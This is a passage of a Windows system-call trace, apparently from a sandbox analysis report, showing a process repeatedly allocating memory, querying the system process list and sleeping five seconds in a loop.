SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0169.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0169.734] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0169.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0169.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0169.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0169.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0169.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0169.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0169.918] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0169.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0169.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0169.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0169.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0169.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0170.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0170.081] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0170.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0170.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0170.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0170.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0170.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0170.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0170.565] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0170.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0170.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0170.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0170.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0170.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0170.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0170.950] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0170.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0170.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0170.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0170.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0170.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0171.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.236] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0171.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0171.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0171.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0171.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0171.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0171.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.408] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0171.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0171.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0171.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0171.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0171.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0171.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.576] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0171.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0171.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0171.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0171.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0171.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0171.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.795] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0171.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0171.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0171.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0171.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0171.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0171.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.947] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0171.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0171.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0171.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0171.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0171.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0172.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.314] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0172.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0172.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0172.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0172.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0172.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0172.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.543] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0172.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0172.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0172.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0172.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0172.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0172.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.723] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0172.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0172.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0172.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0172.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0172.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0172.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.911] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0173.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0173.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0173.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0173.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0173.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0173.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.260] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0173.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0173.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0173.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0173.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0173.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0173.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.448] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0173.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0173.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0173.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0173.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0173.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0173.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.607] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0173.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0173.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0173.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0173.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0173.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0173.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.750] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0173.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0173.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0173.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0173.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0173.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0173.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.877] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0173.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0173.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0173.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0173.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0173.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0174.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.065] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0174.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0174.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0174.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0174.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0174.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0174.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.476] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0174.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x160000, RegionSize=0xdea64*=0x10000) returned 0x0 [0174.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0xc0000004 [0174.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x160000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0174.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x160000, RegionSize=0xdea50*=0x20000) returned 0x0 [0174.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0174.648] 